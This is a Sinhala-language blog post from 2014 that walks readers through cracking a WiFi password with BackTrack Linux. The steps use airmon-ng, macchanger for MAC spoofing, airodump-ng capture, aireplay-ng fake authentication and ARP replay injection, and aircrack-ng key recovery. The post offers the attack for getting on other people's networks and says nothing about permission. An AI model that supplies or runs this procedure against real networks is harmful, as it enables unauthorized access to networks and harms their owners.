Subscribe For Free Updates!

We'll not spam mate! We promise.

Related Posts Plugin for WordPress, Blogger...

Sunday, October 5, 2014

WiFi Password Hack (100% Working)

 

ඔන්න යාලුවනේ සුපිරි වැඩක් ගේනවා. WiFi Password Hack කරන එක ක්‍රමයක්. මේක ටිකක් අමාරු වැඩක් ටිකක් කිඋවට ටිකක්මත් නෙමෙයි. කොහොම උනත් වැඩේ කරල බලන්න කැමති අය විතරක් ඉදිරියටම මේ ලිපිය කියවන්න. ආ...... තව පොඩ්ඩෙන් අමතක වෙනවා වැඩේ කරන්න කලින් මේකත් කියන්න ඕනේ. WiFi Password එක Hack කරන්න අපි පාවිච්චි කරන්නේ Linax BackTrack OS එක එක ගැන දැනුමක් තියෙන අය පමණක් මේක අත්හදා බලන්න.

මේකට ඔනවෙනවා මෙන්න මේ දේවල්....

Compatible Wireless Adapter
Linax BackTrack 5r3 DVD (linux BackTrack නැති අය මෙතනින් බාගන්න.)

linux BackTrack දාගෙන ඉවර උනාට පස්සේ කරන්නේ මෙහෙමයි. Shell
Commands එකක් open කරගන්න. ඊට පස්සේ එකේ "airmon-ng" විදානය දෙන්න. එතකොට තියෙන WiFi network පෙන්වයි.

 

උඩ තියෙන ඉමේජ් එකේ කොළ පාටින් Underline කරලා තියෙන්නේ දැනට පෙන්වන WiFi network එක.

හරි දැන් ඔයාල මේ විදානය දෙන්න airmon-ng stop ra0 
 

ඊටත් පස්සේ මේ ifconfig ra0 down විදානය දෙන්න.
 

දැන් macchanger --mac 00:11:22:33:44:55 ra0 විදානයදෙන්න. 
 

ඊට පස්සේ මේක airmon-ng start ra0
 

අපි ඉහත පියවරයක් කිහිපයේදීම කරේ WiFi network එකේ address එක වෙනස් කරපු එකයි. දැන් මේ විදානය දීල බලන්න පුළුවන් එක වැඩද කියල. airodump-ng ra0
 

දැන් මේ විදානය දෙන්න airodump-ng -c (CHANNEL) -w (ESSID NAME) --bssid (BSSID NUMBER) ra0
 

මෙතනදි අපිට පුලුවන් අපි හැක් කරන්න යන WiFi නෙට්වර්ක් එකේ නියම නම,SSID එක හොයා ගන්න. ඊට පස්සෙ අපිට් පුලුවන් අපි හැක් කරන්න් යන WiFi නෙට්වර්ක් එකට මේ වෙනකොට ලොග් වෙල් ඉන්න් කෙනෙක්ව හොයගන්න. දැන් මේ විදානය දෙන්න.

aireplay-ng -1 0 -a (BSSID NUMBER) -h 00:11:22:33:44:55 -e (ESSID NAME) ra0 

 

දැන් මේක දෙන්න  

aireplay-ng -3 -b (BSSID NUMBER) -h 00:11:22:33:44:55 ra0

 

මෙන්න අවසන් පියවර  aircrack-ng -b (BSSID NUMBER) (ESSID NAME-01.cap)

ඔන්න තියෙනවා KEY එක

 

දැන් ඉතින් මේ වගේ ඔයාලට හම්බවුන key එක ආදාරයෙන් පුළුවන් ඒ network එක භාවිත කරන්න. Comment එකකුත් දාලා යන්න අමතක කරන්න එපා.

මෙය අන්තර්ජාලයෙන් උපුටා ගත්තකි. සම්පුර්ණ හිමිකම webmycomputertips


 

 


 










යාලුවන්ටත් බලන්න Share කරන්න
SOCIALIZE IT →
FOLLOW US →
SHARE IT →

0 comments:

Post a Comment